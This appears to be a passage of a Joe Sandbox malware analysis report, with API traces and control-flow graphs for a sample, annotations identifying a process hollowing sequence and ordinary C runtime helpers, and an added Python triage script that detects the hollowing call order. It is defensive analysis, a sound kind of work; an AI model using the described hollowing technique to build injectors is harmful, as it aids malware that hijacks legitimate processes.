                                          • Opcode ID: 9079a48e8e71482e53dfc76507f2ae7f877e7dbde2288b42057c16e9fce70750
                                          • Instruction ID: 431cc7d4a295281fc9bf47c0b96cf208d655127df510026a83839a9efed663c3
                                          • Opcode Fuzzy Hash: 9079a48e8e71482e53dfc76507f2ae7f877e7dbde2288b42057c16e9fce70750
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Function 00230D9B (memory region 00230000, not PE-backed): CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, processing through 002300DA and 00230073, then CloseHandle and VirtualFree on both buffers (argument values in the API list below).
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00231631,7FAB7E30), ref: 00230E61
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040), ref: 00230E8B
                                          • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000), ref: 00230EA2
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040), ref: 00230EC4
                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?,00000000,0000000E), ref: 00230F36
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?), ref: 00230F41
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?), ref: 00230F8C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                          • String ID:
                                          • API String ID: 721982790-0
                                          • Opcode ID: f3911bdf1ce60f35c7dd64004a57844e1e55d6d21ab9d20bfbecd889ee39f939
                                          • Instruction ID: 5085f06a7aa812ef2fb5b9cfaf979f7f7a33de9d3476188ec746f567d782b063
                                          • Opcode Fuzzy Hash: f3911bdf1ce60f35c7dd64004a57844e1e55d6d21ab9d20bfbecd889ee39f939
                                          • Instruction Fuzzy Hash: 715180B1E20319BBDB209FB4DC95BAEB7B8AF08710F104555F945F7280DB7499118B78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Function 0041B9EE (PE image at 00400000): LoadLibraryExW; on failure GetLastError, two calls to 0041EABA (the "api-ms-" and "ext-ms-" prefix checks), then a second LoadLibraryExW; FreeLibrary on one exit path. Together with the 00000800 flag (LOAD_LIBRARY_SEARCH_SYSTEM32) visible in the 004220EF entry further down, this is the shape of the MSVC C runtime's system-directory DLL loader, not the sample's own import resolution.
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 1e816ce87688622ec726282c4dafe4514aa4901fe74f977d836c6bbf6b1652ce
                                          • Instruction ID: 75a7b4c4e75e062102b4ceedb7ba9e3808390c4d46f14f64f2af66eaeb456fbf
                                          • Opcode Fuzzy Hash: 1e816ce87688622ec726282c4dafe4514aa4901fe74f977d836c6bbf6b1652ce
                                          • Instruction Fuzzy Hash: 2B210531A41221ABDB318B669C44BAB3768DF017E1F200223ED05A7390D738ED8196ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Function 0041C17B (PE image at 00400000): CRT string-conversion helper: __alloca_probe_16, MultiByteToWideChar via 0041ACEF, LCMapStringW via 0041B89F, WideCharToMultiByte via 0041AD6B, heap allocation via 0041ACA1 when the stack buffer is too small, __freea on each exit.
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 0041C1FF
                                          • __alloca_probe_16.LIBCMT ref: 0041C2C5
                                          • __freea.LIBCMT ref: 0041C331
                                            • Part of subcall function 0041ACA1: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E0E2,?,?,00401942,00000000,?,00401851), ref: 0041ACD3
                                          • __freea.LIBCMT ref: 0041C33A
                                          • __freea.LIBCMT ref: 0041C35D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 1423051803-0
                                          • Opcode ID: cc80a806a169eab05e58413dacbc66e9f9c5e0c7cf95fe716d8602c99327d2d3
                                          • Instruction ID: 6d4edd65040881752d9885094900a985f24b8fe9645ab17a0ae6498ed45cbe57
                                          • Opcode Fuzzy Hash: cc80a806a169eab05e58413dacbc66e9f9c5e0c7cf95fe716d8602c99327d2d3
                                          • Instruction Fuzzy Hash: 50510672A4020AAFDB219F95CC81EFB37A9EF85754F15412BFC14A7240E738DC918699
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Function 0023020A (memory region 00230000, not PE-backed): CreateProcessW, ReadProcessMemory, helper calls at 002311E1, 002312FB (three times), 002300DA and 00230F9A, then Wow64SetThreadContext and 0023109B; cleanup runs through 0023114C, and the block at 002306DC can loop back to the CreateProcessW block. Creating a child, reading its memory and rewriting its thread context is the sequence characteristic of process hollowing. The lone string "D" is the byte 0x44 = 68, which is sizeof(STARTUPINFOW) on 32-bit Windows, so it is most likely the cb field initialised for CreateProcessW rather than a real string.
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 5f82a25b001eef986d9a981a6cbd625316d3570d34d0e9bba76da4b8eb28fee1
                                          • Instruction ID: 913c8fc3ac625a1fee3869133194d008a953afd73022a5488c343fd139ce26f0
                                          • Opcode Fuzzy Hash: 5f82a25b001eef986d9a981a6cbd625316d3570d34d0e9bba76da4b8eb28fee1
                                          • Instruction Fuzzy Hash: 3102F4B0E20209EFDF14CF94C995BADBBB5BF08705F204059E515BA2A1D774AEA0DF24
                                          Uniqueness

                                          Uniqueness Score: -1.00%
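
Worked example (added here; not part of the Joe Sandbox report and not code from the sample or from Joe Sandbox): a small Python triage script that parses the report's "APIs" bullet lines in the format used throughout these entries, decodes the flag-valued parameters (CreateFileW access and disposition, VirtualAlloc/VirtualFree type and protection, CreateProcessW creation flags) and checks two call orderings exhibited by the 00230000-region functions on this page: the open-file / commit-memory / read sequence of 00230D9B, and the CreateProcessW -> ReadProcessMemory -> Wow64SetThreadContext sequence of 0023020A. The first trace is copied verbatim from the 00230D9B API list; the second is constructed, because the 0023020A entry gives only the graph and no argument lists, so its handles, addresses, ref values and CREATE_SUSPENDED flag are illustrative. The pattern names and the `triage` function are this example's own. Two caveats are built in: Joe Sandbox prints 16 stack slots per call, so slots beyond an API's documented arity are caller stack residue and are not decoded; and reading a file into committed memory is ordinary program behaviour, so `file_to_memory` is context, while a suspended child followed by a thread-context rewrite is the ordering worth alerting on.

```python
import re
from typing import NamedTuple, Optional, Sequence

# One resolved call per line, in the report's "APIs" bullet format, e.g.
#   CreateFileW.KERNELBASE(00000000,80000000,...), ref: 00230E61
#   SetUnhandledExceptionFilter.KERNEL32 ref: 0040F702   (no argument list)
LINE_RE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

class Call(NamedTuple):
    api: str
    module: str
    args: tuple   # one int per printed slot, None where the sandbox printed '?'
    ref: int      # call-site return address

def parse_call(line: str) -> Optional[Call]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m["args"]
    args = () if not raw else tuple(None if s.strip() == "?" else int(s, 16)
                                    for s in raw.split(","))
    return Call(m["api"], m["module"], args, int(m["ref"], 16))

def parse_trace(text: str) -> list:
    return [c for c in map(parse_call, text.splitlines()) if c is not None]

# Win32 SDK constants for the parameters decoded below.
MEM_FLAGS = [(0x1000, "MEM_COMMIT"), (0x2000, "MEM_RESERVE"), (0x4000, "MEM_DECOMMIT"), (0x8000, "MEM_RELEASE")]
ACCESS_FLAGS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CREATE_SUSPENDED = 0x4

def bits(value: int, table) -> str:
    names = [name for bit, name in table if value & bit]
    return "|".join(names) if names else hex(value)

def known(args: tuple, n: int) -> bool:
    """First n slots were printed as concrete values rather than '?'."""
    return len(args) >= n and all(a is not None for a in args[:n])

def describe(call: Call) -> str:
    """Decode documented parameters only. Joe Sandbox prints 16 stack slots per
    call, so slots past the API's real arity are caller stack residue; ignore them."""
    a = call.args
    if call.api == "CreateFileW" and known(a, 6):
        return (f"CreateFileW(access={bits(a[1], ACCESS_FLAGS)}, share={a[2]:#x}, "
                f"disposition={DISPOSITION.get(a[4], hex(a[4]))}, attrs={a[5]:#x})")
    if call.api == "VirtualAlloc" and known(a, 4):
        return (f"VirtualAlloc(size={a[1]:#x}, type={bits(a[2], MEM_FLAGS)}, "
                f"protect={PAGE_PROT.get(a[3], hex(a[3]))})")
    if call.api == "VirtualFree" and known(a, 3):
        return f"VirtualFree(size={a[1]:#x}, type={bits(a[2], MEM_FLAGS)})"
    if call.api == "CreateProcessW" and known(a, 6):
        return "CreateProcessW(CREATE_SUSPENDED)" if a[5] & CREATE_SUSPENDED else f"CreateProcessW(flags={a[5]:#x})"
    return f"{call.api}(undecoded)"

def occurs_in_order(calls: Sequence[Call], pattern) -> bool:
    """Each step (a tuple of acceptable API names) must be matched by a call that
    comes after the call matched by the previous step."""
    remaining = iter(calls)
    return all(any(c.api in step for c in remaining) for step in pattern)

# Orderings exhibited by the 00230000-region functions in this report.
FILE_TO_MEMORY = (("CreateFileW",), ("VirtualAlloc",), ("ReadFile",))        # 00230D9B
HOLLOWING = (("CreateProcessW",), ("ReadProcessMemory",),
             ("SetThreadContext", "Wow64SetThreadContext"))                   # 0023020A

def triage(text: str) -> dict:
    calls = parse_trace(text)
    suspended = any(c.api == "CreateProcessW" and known(c.args, 6)
                    and c.args[5] & CREATE_SUSPENDED for c in calls)
    return {"calls": len(calls),
            "file_to_memory": occurs_in_order(calls, FILE_TO_MEMORY),
            "hollowing": occurs_in_order(calls, HOLLOWING),
            "suspended_child": suspended,
            "decoded": [describe(c) for c in calls]}

# Copied verbatim from the 00230D9B API list of this report.
LOADER_TRACE = """
• CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00231631,7FAB7E30), ref: 00230E61
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040), ref: 00230E8B
• ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000), ref: 00230EA2
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?,00000000,0000000E), ref: 00230F36
• VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231631,7FAB7E30,002312EF,00000000,00000040,?), ref: 00230F41
"""

# CONSTRUCTED: the 0023020A entry gives only the graph, no argument lists, so
# the handles, addresses, ref values and CREATE_SUSPENDED flag are illustrative.
HOLLOWING_TRACE = """
• CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 002303E9
• ReadProcessMemory.KERNELBASE(000000F8,7FFDE008,?,00000004,00000000), ref: 0023042D
• Wow64SetThreadContext.KERNELBASE(000000FC,?), ref: 00230696
"""

if __name__ == "__main__":
    for name, trace in (("loader", LOADER_TRACE), ("hollowing", HOLLOWING_TRACE)):
        result = triage(trace)
        print(name, {k: v for k, v in result.items() if k != "decoded"}, *result["decoded"], sep="\n  ")
```

Run it directly to print both decodings; on a real report, paste the API bullets of one function entry into `triage`. Matching API order within a single function, as done here, is deliberately stricter than matching across the whole process trace, where benign CRT calls such as the LoadLibraryExW helpers in this report interleave with the interesting ones.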

                                          Control-flow Graph
                                          • Function 004220EF (PE image at 00400000): LoadLibraryExW with flags 00000800 (LOAD_LIBRARY_SEARCH_SYSTEM32); on failure GetLastError, a prefix check against "api-ms-" via 0041EABA, then LoadLibraryExW again with flags 0. The fallback exists for Windows versions that reject LOAD_LIBRARY_SEARCH_SYSTEM32 with ERROR_INVALID_PARAMETER; the call stack in the API list below shows it resolving InitializeCriticalSectionEx, i.e. MSVC C runtime start-up rather than malware behaviour.
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,0042218B,00000000,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C), ref: 004220FC
                                          • GetLastError.KERNEL32(?,0042218B,00000000,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C,00000000,?,0041A94C), ref: 00422106
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0042212E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: 59a04169ea6d4d95635d84a846355b1e456eb0b3a79eec30dccb626f617f785e
                                          • Instruction ID: fc242c96d07ba1ba5137a2309fdb626edb44cf858da1c29ccb6cba67ef9a6a2c
                                          • Opcode Fuzzy Hash: 59a04169ea6d4d95635d84a846355b1e456eb0b3a79eec30dccb626f617f785e
                                          • Instruction Fuzzy Hash: 6AE01270780204BAEB301F52EC06F6A7B66AF10B91F904032FA4CA41E0D7B59CA1D58D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph
                                          • Function 0041C953 (PE image at 00400000): CRT code-page set-up: 0041C8B3, then 0041C7DD (GetOEMCP/GetACP), heap allocation via 0041ACA1, 0041C5EA (IsValidCodePage/GetCPInfo), errno mapping via 00415317 (__dosmaperr), _free via 0041AC67, and 0041CCA8 executed under a critical section.
                                          APIs
                                            • Part of subcall function 0041C7DD: GetOEMCP.KERNEL32(00000000,0041C96E,00000000,00000000,0042190B,0042190B,00000000,00000000,00000000), ref: 0041C808
                                          • _free.LIBCMT ref: 0041C9CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: (U
                                          • API String ID: 269201875-1038552597
                                          • Opcode ID: cec2dc70aef15dcc1e193a349e072108923eab96f25ae85ad9b128b179b5290a
                                          • Instruction ID: 21ae2229421282a0f34250d89c358c044478b6e29def4b0f04777ce2107de751
                                          • Opcode Fuzzy Hash: cec2dc70aef15dcc1e193a349e072108923eab96f25ae85ad9b128b179b5290a
                                          • Instruction Fuzzy Hash: A2319CB2900209AFCB01DF69C881ADF77A5EF44354F11406BF9159B3A1EB3A9D91CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 363 41cb28-41cb4a 364 41cb50-41cb62 GetCPInfo 363->364 365 41cc5c-41cc63 363->365 364->365 366 41cb68-41cb6f 364->366 367 41cc65-41cc6e 365->367 368 41cb71-41cb7b 366->368 369 41cc70-41cc78 367->369 370 41cc7a-41cc7d 367->370 368->368 371 41cb7d-41cb90 368->371 372 41cc8d-41cc97 369->372 373 41cc8b 370->373 374 41cc7f-41cc89 370->374 376 41cbb1-41cbb3 371->376 372->367 375 41cc99-41cca7 call 40f907 372->375 373->372 374->372 378 41cb92-41cb99 376->378 379 41cbb5-41cbec call 41c02f call 41c132 376->379 381 41cba8-41cbaa 378->381 388 41cbf1-41cc1c call 41c132 379->388 383 41cb9b-41cb9d 381->383 384 41cbac-41cbaf 381->384 383->384 387 41cb9f-41cba7 383->387 384->376 387->381 391 41cc1e-41cc29 388->391 392 41cc39-41cc3c 391->392 393 41cc2b-41cc37 391->393 395 41cc4c 392->395 396 41cc3e-41cc4a 392->396 394 41cc4e-41cc58 393->394 394->391 397 41cc5a 394->397 395->394 396->394 397->375
                                          APIs
                                          • GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 0041CB5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: 855a859752abcec589858d9807460375745186d6f5beff0676cc2bfde8d4a19d
                                          • Instruction ID: a96c3065caeaac77d3f74e8a83fe439cdd8a73e50797608b124c6a1eeaa8ad91
                                          • Opcode Fuzzy Hash: 855a859752abcec589858d9807460375745186d6f5beff0676cc2bfde8d4a19d
                                          • Instruction Fuzzy Hash: DE4149B01442489BDB218F18CDC4BF77BED9B05304F2404AEE5CEC7142E239AD85DBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 398 41b81c-41b83f call 41bab5 401 41b841-41b854 398->401 402 41b856-41b85c InitializeCriticalSectionAndSpinCount 398->402 403 41b862-41b864 401->403 402->403
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 0041B85C
                                          Strings
                                          • InitializeCriticalSectionEx, xrefs: 0041B82C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx
                                          • API String ID: 2593887523-3084827643
                                          • Opcode ID: f9072bed2894d461a612be17e23af7c58d594345834647678f603cfa8b89610f
                                          • Instruction ID: 2bbf1eba4325091a8f805affcf2631c9889cc8d83d0959772aab057c07b2e122
                                          • Opcode Fuzzy Hash: f9072bed2894d461a612be17e23af7c58d594345834647678f603cfa8b89610f
                                          • Instruction Fuzzy Hash: 6FE09231641228B7DF113F51EC05EDE7F16EB44BA0F508066FA1815171CB754861ABD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 406 41b6a2-41b6b9 call 41bab5 408 41b6be-41b6c5 406->408 409 41b6c7-41b6d4 408->409 410 41b6d6 TlsAlloc 408->410 411 41b6dc-41b6de 409->411 410->411
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: b40d68b16dcda4e9474c7c98bf42229f5c6d560e9727103d880ce395b472c8ac
                                          • Instruction ID: 2f77c67e21683032b7867c90a944dd36eb87b62326515653e0abd7e7556b6c66
                                          • Opcode Fuzzy Hash: b40d68b16dcda4e9474c7c98bf42229f5c6d560e9727103d880ce395b472c8ac
                                          • Instruction Fuzzy Hash: 8DE0C231B8223467822136527D06ADEBE05DB70BE0B514027F90861241DFA948818ADE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 414 41c5ea-41c60f call 41c7dd 417 41c7c5-41c7c6 call 41c84e 414->417 418 41c615-41c61b 414->418 421 41c7cb-41c7cd 417->421 420 41c61e-41c624 418->420 422 41c62a-41c636 420->422 423 41c71d-41c73c call 4128a0 420->423 425 41c7ce-41c7dc call 40f907 421->425 422->420 426 41c638-41c63e 422->426 431 41c73f-41c744 423->431 429 41c715-41c718 426->429 430 41c644-41c650 IsValidCodePage 426->430 429->425 430->429 433 41c656-41c65d 430->433 434 41c746-41c74b 431->434 435 41c77b-41c785 431->435 436 41c685-41c692 GetCPInfo 433->436 437 41c65f-41c66b 433->437 440 41c778 434->440 441 41c74d-41c753 434->441 435->431 442 41c787-41c7ae call 41caea 435->442 438 41c694-41c6b3 call 4128a0 436->438 439 41c709-41c70f 436->439 443 41c66f-41c67b call 41cb28 437->443 438->443 453 41c6b5-41c6bc 438->453 439->417 439->429 440->435 445 41c76c-41c76e 441->445 455 41c7af-41c7be 442->455 452 41c680 443->452 449 41c770-41c776 445->449 450 41c755-41c75b 445->450 449->434 449->440 450->449 454 41c75d-41c768 450->454 452->421 457 41c6df-41c6e2 453->457 458 41c6be-41c6c3 453->458 454->445 455->455 456 41c7c0 455->456 456->417 460 41c6e7-41c6ee 457->460 458->457 459 41c6c5-41c6cb 458->459 461 41c6d3-41c6d5 459->461 460->460 462 41c6f0-41c704 call 41caea 460->462 463 41c6d7-41c6dd 461->463 464 41c6cd-41c6d2 461->464 462->443 463->457 463->458 464->461
                                          APIs
                                            • Part of subcall function 0041C7DD: GetOEMCP.KERNEL32(00000000,0041C96E,00000000,00000000,0042190B,0042190B,00000000,00000000,00000000), ref: 0041C808
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,0041C9B5,00000000,00000000,00000000,?,00000000,?,?,?,0042190B), ref: 0041C648
                                          • GetCPInfo.KERNEL32(00000000,0041C9B5,?,?,0041C9B5,00000000,00000000,00000000,?,00000000,?,?,?,0042190B,00000000,00000000), ref: 0041C68A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 0c3d3d7acd6dd14b59517c8ab4072126db1735044733578a7a9a37ad46e82433
                                          • Instruction ID: 7c52d88972ac2dace6bcdf081ad171f92710c8c916e3215b7aff95bd971f8e57
                                          • Opcode Fuzzy Hash: 0c3d3d7acd6dd14b59517c8ab4072126db1735044733578a7a9a37ad46e82433
                                          • Instruction Fuzzy Hash: 9F510370A803469EDB218F66CCC16FBBBE5AF51304F14406FD09687291E7B89982CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 467 42213a-422155 468 422157-422159 467->468 469 42215b-42215d 467->469 470 4221b1-4221b3 468->470 469->470 471 42215f-422164 469->471 472 4221a3-4221a6 471->472 473 422166-422177 472->473 474 4221a8-4221ad 472->474 476 422179-42217b 473->476 477 42217f-422186 call 4220ef 473->477 475 4221af-4221b0 474->475 475->470 478 4221c3-4221cf GetProcAddress 476->478 479 42217d 476->479 483 42218b-42219a 477->483 478->474 481 4221d1-4221d8 478->481 482 4221a0 479->482 481->475 482->472 484 4221b4-4221ba 483->484 485 42219c-42219e 483->485 484->478 486 4221bc-4221bd FreeLibrary 484->486 485->482 486->478
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C,00000000,?,0041A94C,00432FF0,00000FA0), ref: 004221BD
                                          • GetProcAddress.KERNEL32(00000000,?,?,00432FF0,?,?,?,004220C2,00000004,InitializeCriticalSectionEx,00429534,0042953C,00000000,?,0041A94C,00432FF0), ref: 004221C7
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeLibraryProc
                                          • String ID:
                                          • API String ID: 3013587201-0
                                          • Opcode ID: 5e6590639f837f3f74b4bd3a25c60f29f496a02501eb8b08b72b8ada3bcd0099
                                          • Instruction ID: 309f8aec9f5dc071c213e6da4586d0d84bc111e18403b1771997db904bcccf5e
                                          • Opcode Fuzzy Hash: 5e6590639f837f3f74b4bd3a25c60f29f496a02501eb8b08b72b8ada3bcd0099
                                          • Instruction Fuzzy Hash: 00117F36701125BF9F22CF54ED80DAA73A4EB463507940266EA01DB350E674EE62CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 487 4199d4-4199d9 call 421fb9 489 4199de-4199e7 487->489 490 4199e9-4199eb 489->490 491 4199ec-4199fb call 42206a 489->491 494 419a04-419a06 491->494 495 4199fd-419a02 call 419a07 491->495 495->490
                                          APIs
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004199F2
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004199FD
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
